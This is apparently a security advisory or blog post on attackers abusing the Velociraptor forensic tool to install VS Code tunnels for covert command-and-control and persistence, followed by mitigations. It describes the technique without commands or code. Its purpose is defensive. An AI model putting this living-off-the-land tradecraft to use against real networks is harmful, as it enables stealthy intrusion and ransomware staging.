Attackers are now abusing Velociraptor, a legitimate digital forensics and incident response (DFIR) tool, to compromise networks and deploy Visual Studio Code (VS Code) for covert communication.¹ This sophisticated tactic allows them to establish a command and control (C2) channel and evade detection by leveraging trusted, signed software.²

---

The Modus Operandi

The attack chain starts with the initial compromise of a network, often through phishing or an exploit.³ Instead of deploying traditional malware, the attackers use the Windows msiexec utility to download a malicious Velociraptor installer from a staging server, often hosted on a platform like Cloudflare Workers.⁴

Once Velociraptor is installed, the attackers use it to download and execute Visual Studio Code with its built-in tunneling feature enabled.⁵ This feature, meant for legitimate remote development, creates a secure, encrypted tunnel from the compromised machine to an attacker-controlled C2 server.⁶ Since VS Code is a signed application from Microsoft, its activity is often not flagged by security software.⁷

The attackers also install VS Code as a persistent service on the system, ensuring they can maintain a backdoor even after a reboot.⁸ The use of Velociraptor as the initial payload and Visual Studio Code for C2 tunneling is particularly concerning because it allows attackers to “live off the land” by using legitimate tools to carry out their malicious activities.⁹ This technique minimizes their footprint and makes it more difficult for defenders to differentiate between benign and malicious network activity.¹⁰

---

Why This Is a Problem for Defenders

• Bypassing Security Tools: Many endpoint detection and response (EDR) solutions are configured to allow trusted applications like Velociraptor and VS Code to run unimpeded. This attack exploits that trust.
• Encrypted Traffic: The C2 communication is carried out over an encrypted tunnel, making it difficult to inspect with traditional network monitoring tools.
• Stealthy Persistence: By installing VS Code as a service, attackers can maintain a long-term presence on a network without needing to rely on easily detectable malware.¹¹
• Precursor to Ransomware: Security researchers note that the unauthorized use of DFIR tools like Velociraptor is often a precursor to a ransomware attack.¹²

---

What to Do

Organizations should take a proactive approach to mitigate this threat. This includes:

• Enhanced Monitoring: Monitor for the unexpected installation or execution of legitimate DFIR tools on endpoints where they are not typically used.¹³
• Behavioral Analytics: Leverage EDR and XDR solutions to detect anomalous behaviors, such as a process like VS Code initiating a remote tunnel or a forensic tool being used in an unusual manner.¹⁴
• Application Control: Implement strict application whitelisting policies to prevent the execution of unapproved software and to block unexpected services from being installed.¹⁵
• Network Segmentation: Restrict outbound network connections and enforce strict egress filtering to prevent internal systems from communicating with untrusted domains.¹⁶

This incident highlights a shift in attacker tactics, where they are now weaponizing defensive tools to their advantage. Security teams must adapt by focusing on detecting suspicious behaviors rather than just relying on signatures for known malware.

This video provides information on how the Velociraptor forensic tool is being used for C2 tunneling.

Velociraptor C2 tunnel, Baltimore’s expensive con, ransomware gangs multiply